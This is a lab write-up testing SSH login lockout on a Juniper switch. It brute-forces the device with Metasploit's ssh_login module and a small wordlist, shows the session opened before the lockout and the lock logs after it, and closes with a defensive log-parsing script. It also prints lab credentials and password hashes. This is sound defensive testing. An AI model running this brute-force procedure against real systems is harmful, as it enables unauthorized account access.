
Juniper login lockout test after the retry threshold

Test details

Attacker information

  • Kali Linux
  • IP: 10.1.1.50
  • Tool: msfconsole

Juniper device information

  • IP: 10.1.1.1
  • Accounts: snet / snet1234, test / snet1234

msfconsole? ⇒ Metasploit

  • Metasploit
  • A penetration-testing framework that packages attacks for known, CVE-numbered vulnerabilities so that they can be exercised simply
  • Characteristics
    • Composed of information-gathering modules, exploits, and the plugins (payloads) used by the exploits
    • External modules such as vulnerability checkers and port scanners can be used, and results can be stored in a database
    • Information gathering and exploit modules can be run with little setup
    • External (Linux) commands can be run from inside msfconsole
    • Output of attack tools run on Linux can be executed from Metasploit and the results saved

msfconsole setup

  1. Start msfconsole

    ┌──(root㉿kali)-[~]
    └─# msfconsole
    
  2. Set the SSH target information

    
    msf6 > use auxiliary/scanner/ssh/ssh_login
    msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.1.1.1
    RHOSTS => 10.1.1.1
    msf6 auxiliary(scanner/ssh/ssh_login) > set USERNAME snet
    USERNAME => snet
    msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/pw.txt
    PASS_FILE => /root/pw.txt
    
    • The file referenced by PASS_FILE must be prepared in advance

      • Contents of pw.txt, the PASS_FILE input
      ┌──(root㉿kali)-[~]
      └─# cat /root/pw.txt 
      123
      1234
      aaa
      124qw
      snet
      snet1234
      
  3. Run the attack

    msf6 auxiliary(scanner/ssh/ssh_login) > run
    

Juniper device configuration

  • Config contents
root# show | display set 
set version 21.4R2.10
set system root-authentication encrypted-password "$6$dClM4ieF$DT/bhVyfl6yjRoNOeHORkGLYH2CR77QfZ3KXWtsG/jzS.nvY3.8lHn/bOiZXDBfyHXrkAU9Dd8simXJrsUCet1"
**set system login retry-options tries-before-disconnect 5
set system login retry-options lockout-period 5**
set system login user snet uid 2001
set system login user snet class super-user
set system login user snet authentication encrypted-password "$6$sHNGYNXZ$IltWhWLceNzthHyMWaANLKoxu5JBoJij9csEq3HHoClIZZdCGHWfMTiq/eciZoUdrU8YCV6h1YNFo5sX/IjH0."
set system services ssh
set system services telnet
set system syslog user snet kernel any
set interfaces ge-0/0/0 unit 0 family ethernet-switching vlan members 1
set interfaces irb unit 1 family inet address 10.1.1.1/24
set vlans default vlan-id 1
set vlans default l3-interface irb.1
set vlans test vlan-id 10
  • Highlighted lines
    • After 5 failed login attempts, logins are locked for 5 minutes
  • Other lines
    • Login user account settings and the management IP address

Results

  • Result before setting the login-attempt threshold

    msf6 auxiliary(scanner/ssh/ssh_login) > run
    
    [*] 10.1.1.1:22 - Starting bruteforce
    [+] 10.1.1.1:22 - Success: 'snet:snet1234' 'Model: ex3400-48t, Junos: 21.4R2.10, JUNOS OS Kernel 32-bit  [20220228.82e60e3_builder_stable_12_214]'
    [*] SSH session 1 opened (10.1.1.50:33251 -> 10.1.1.1:22) at 2024-04-03 02:32:17 -0400
    [-] 10.1.1.1:22 - While a session may have opened, it may be bugged.  If you experience issues with it, re-run this module with 'set gatherproof false'.  Also consider submitting an issue at github.com/rapid7/metasploit-framework with device details so it can be handled in the future.
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    
    msf6 auxiliary(scanner/ssh/ssh_login) > 
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i
    
    Active sessions
    ===============
    
      Id  Name  Type           Information  Connection
      --  ----  ----           -----------  ----------
      1         shell unknown  SSH root @   10.1.1.50:33251 -> 10.1.1.1:22 (10.1.1.1)
    
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
    [*] Starting interaction with 1...
    
    {master:0}
    snet> 
    
    • After run, a Success result is shown
    • sessions -i lists the sessions the attack opened
    • sessions -i [number] attaches to one of those sessions
  • Result after setting the login-attempt threshold

    • In pw.txt (the PASS_FILE input), the device password "snet1234" is the sixth entry, so it cannot be reached within the threshold of 5 attempts (see the msfconsole setup toggle)
    msf6 auxiliary(scanner/ssh/ssh_login) > run
    
    [*] 10.1.1.1:22 - Starting bruteforce
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i
    
    Active sessions
    ===============
    
    No active sessions.
    
    • sessions -i shows no usable session
    • The Juniper log shows the account being locked because of the failed logins
    root# Apr  3 16:40:51   sshd[19913]: LIBJNX_LOGIN_ACCOUNT_UNLOCKED: Account for user 'snet' has been unlocked for logins
    Apr  3 16:40:51   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:40:51   sshd[19913]: error: PAM: Authentication error for snet from 10.1.1.50
    Apr  3 16:40:51   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:40:56   inetd[12872]: /usr/sbin/sshd[19913]: exited, status 255
    Apr  3 16:40:57   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:40:57   sshd[19916]: error: PAM: Authentication error for snet from 10.1.1.50
    Apr  3 16:40:57   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:02   inetd[12872]: /usr/sbin/sshd[19916]: exited, status 255
    **Apr  3 16:41:03   sshd[19919]: LIBJNX_LOGIN_ACCOUNT_LOCKED: Account for user 'snet' has been locked out from logins**
    Apr  3 16:41:03   sshd[19919]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    Apr  3 16:41:03   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:03   sshd[19921]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    Apr  3 16:41:03   sshd[19919]: error: PAM: Authentication error for snet from 10.1.1.50
    Apr  3 16:41:03   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:08   inetd[12872]: /usr/sbin/sshd[19919]: exited, status 255
    Apr  3 16:41:09   sshd[19922]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    Apr  3 16:41:09   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:09   sshd[19924]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    Apr  3 16:41:09   sshd[19922]: error: PAM: Authentication error for snet from 10.1.1.50
    Apr  3 16:41:09   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:14   inetd[12872]: /usr/sbin/sshd[19922]: exited, status 255
    Apr  3 16:41:15   sshd[19925]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    Apr  3 16:41:15   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:15   sshd[19927]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    Apr  3 16:41:15   sshd[19925]: error: PAM: Authentication error for snet from 10.1.1.50
    Apr  3 16:41:15   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
    Apr  3 16:41:20   inetd[12872]: /usr/sbin/sshd[19925]: exited, status 255
    Apr  3 16:41:21   sshd[19928]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
    **Apr  3 16:41:21   sshd[19928]: PAM_USER_LOCK_ACCOUNT_LOCKED: Account for user snet is locked.**
    
    • A direct SSH attempt from PuTTY or from Kali also shows the lockout
    login as: snet
    Keyboard-interactive authentication prompts from server:
    | Password:
    End of keyboard-interactive prompts from server
    **Access denied**
    
    ┌──(root㉿kali)-[~]
    └─# ssh snet@10.1.1.1
    (snet@10.1.1.1) Password:
    **Connection closed by 10.1.1.1 port 22**
    
    • After the configured 5 minutes, normal login was confirmed to work again
    • Locked accounts can be listed with show system login lockout
    {master:0}[edit]
    snet# run show system login lockout                      
    User                 Lockout start           Lockout end
    snet                 2024-04-03 17:29:23 UTC 2024-04-03 17:31:23 UTC
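As an added example (not part of the original write-up), the following Python script parses Junos sshd syslog lines of the kind shown above, counts failed authentications per user and source host, records LIBJNX_LOGIN_ACCOUNT_LOCKED and PAM_USER_LOCK_LOGIN_REQUESTS_DENIED events, and raises an alert when a host reaches the configured tries-before-disconnect value. The sample log is constructed in the same format as the device output; the year, absent from syslog timestamps, is assumed to be 2024.

```python
import re
from collections import defaultdict
from datetime import datetime

# Junos syslog formats from the lockout test. SSHD_LOGIN_FAILED appears twice per attempt
# in that log, so the single "error: PAM" line is used to count attempts instead.
TS = re.compile(r"^(\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2})")
PAM_ERR = re.compile(r"error: PAM: Authentication error for (\S+) from (\S+)")
LOCKED = re.compile(r"LIBJNX_LOGIN_ACCOUNT_LOCKED: Account for user '([^']+)' has been locked out")
DENIED = re.compile(r"PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '([^']+)' are denied")

def parse_ts(line, year=2024):
    """Syslog lines carry no year; the caller supplies it (assumed 2024 here)."""
    m = TS.match(line)
    return datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S") if m else None

def analyze(lines, tries_before_lock=5):
    """Summarise failed SSH logins, lock events and denied requests; alert at the threshold."""
    attempts = defaultdict(int)   # (user, host) -> failed authentication attempts
    locked = {}                   # user -> time of LIBJNX_LOGIN_ACCOUNT_LOCKED
    denied = defaultdict(int)     # host -> requests rejected while the account was locked
    alerts = []
    for line in lines:
        ts = parse_ts(line)
        if m := PAM_ERR.search(line):
            user, host = m.groups()
            attempts[(user, host)] += 1
            if attempts[(user, host)] == tries_before_lock:
                alerts.append(f"{ts}: {host} reached {tries_before_lock} failed logins for '{user}'")
        elif m := LOCKED.search(line):
            locked[m.group(1)] = ts
        elif m := DENIED.search(line):
            denied[m.group(1)] += 1
    return {"attempts": dict(attempts), "locked": locked, "denied": dict(denied), "alerts": alerts}

# Constructed sample in the same format as the device log (not a real capture).
SAMPLE_LOG = """\
Apr  3 16:40:45   sshd[19910]: error: PAM: Authentication error for snet from 10.1.1.50
Apr  3 16:40:51   sshd: SSHD_LOGIN_FAILED: Login failed for user 'snet' from host '10.1.1.50'
Apr  3 16:40:51   sshd[19913]: error: PAM: Authentication error for snet from 10.1.1.50
Apr  3 16:40:57   sshd[19916]: error: PAM: Authentication error for snet from 10.1.1.50
Apr  3 16:41:03   sshd[19919]: LIBJNX_LOGIN_ACCOUNT_LOCKED: Account for user 'snet' has been locked out from logins
Apr  3 16:41:03   sshd[19919]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
Apr  3 16:41:03   sshd[19919]: error: PAM: Authentication error for snet from 10.1.1.50
Apr  3 16:41:09   sshd[19922]: PAM_USER_LOCK_LOGIN_REQUESTS_DENIED: Login requests from host '10.1.1.50' are denied
Apr  3 16:41:09   sshd[19922]: error: PAM: Authentication error for snet from 10.1.1.50
""".splitlines()

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG)["alerts"]:
        print(alert)
```

Feed the real device log (for example from `show log messages`) instead of SAMPLE_LOG to check that the lock fires at the configured threshold and to see which source hosts are being denied.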